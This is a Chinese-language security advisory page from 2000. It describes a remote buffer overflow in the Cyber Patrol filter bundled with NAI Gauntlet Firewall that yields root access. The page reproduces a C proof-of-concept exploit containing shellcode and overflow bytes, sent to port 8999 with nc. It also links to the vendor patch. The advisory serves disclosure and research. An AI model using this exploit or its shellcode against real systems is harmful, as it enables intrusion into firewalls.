首页 -> 安全研究
安全研究
安全漏洞
Gauntlet 防火墙远程溢出漏洞
发布日期:2000-05-25
更新日期:2000-05-26
受影响系统:
Network Associates Gauntlet Firewall 4.1 / 4.2 / 5.0 / 5.5描述:
NAI Gauntlet防火墙(4.1/4.2/5.0/5.5)中所带的过滤软件Cyber Patrol存在一个溢出问题,
导致一个远程攻击者获得防火墙的root访问权限,并且在防火墙上执行任意系统命令。
缺省情况下,Cyber Patrol在gauntlet安装时被装入,30天后过期。在Cyber Patrol运行期
间,Gauntlet防火墙是可能受到远程攻击的。由于这个过滤软件可以通过外部访问,因此外部
攻击者也可能利用这个漏洞,而不仅仅限于内部网络用户。
<* 来源: Jim Stickley
gramble none <gramble_n@HOTMAIL.COM>
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it. ;) I do not have a Sparc or I would
* write up the Solaris one too. If you have one, please
* make the changes needed and post it. Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall. To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intened for proof of concept only.
*
*
* _Gramble_
* Hey BuBBles
*
*To use:
* # Animal | nc <address> 8999
*/
#include <stdio.h>
char data[364];
main() {
int i;
char shelloutput[80];
/* just borrowed this execute code from another exploit */
unsigned char shell[] =
"\x90"
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";
for(i=0;i<264;i++)
data[i]=0x90;
data[i]=0x30;i++;
data[i]=0x9b;i++;
data[i]=0xbf;i++;
data[i]=0xef;i++;
data[i] = 0x00;
for (i=0; i<strlen(shell); i++)
shelloutput[i] = shell[i];
shelloutput[i] = 0x00;
printf("10003.http://%s%s", data, shelloutput);
}
建议:
NAI已经提供了针对各个Gauntlet防火墙版本的补丁以及安全建议,您可以在下列地址找到相
关内容:
http://www.tis.com/support/cyberadvisory.html
浏览次数:6049
严重程度:0(网友投票)
绿盟科技给您安全的保障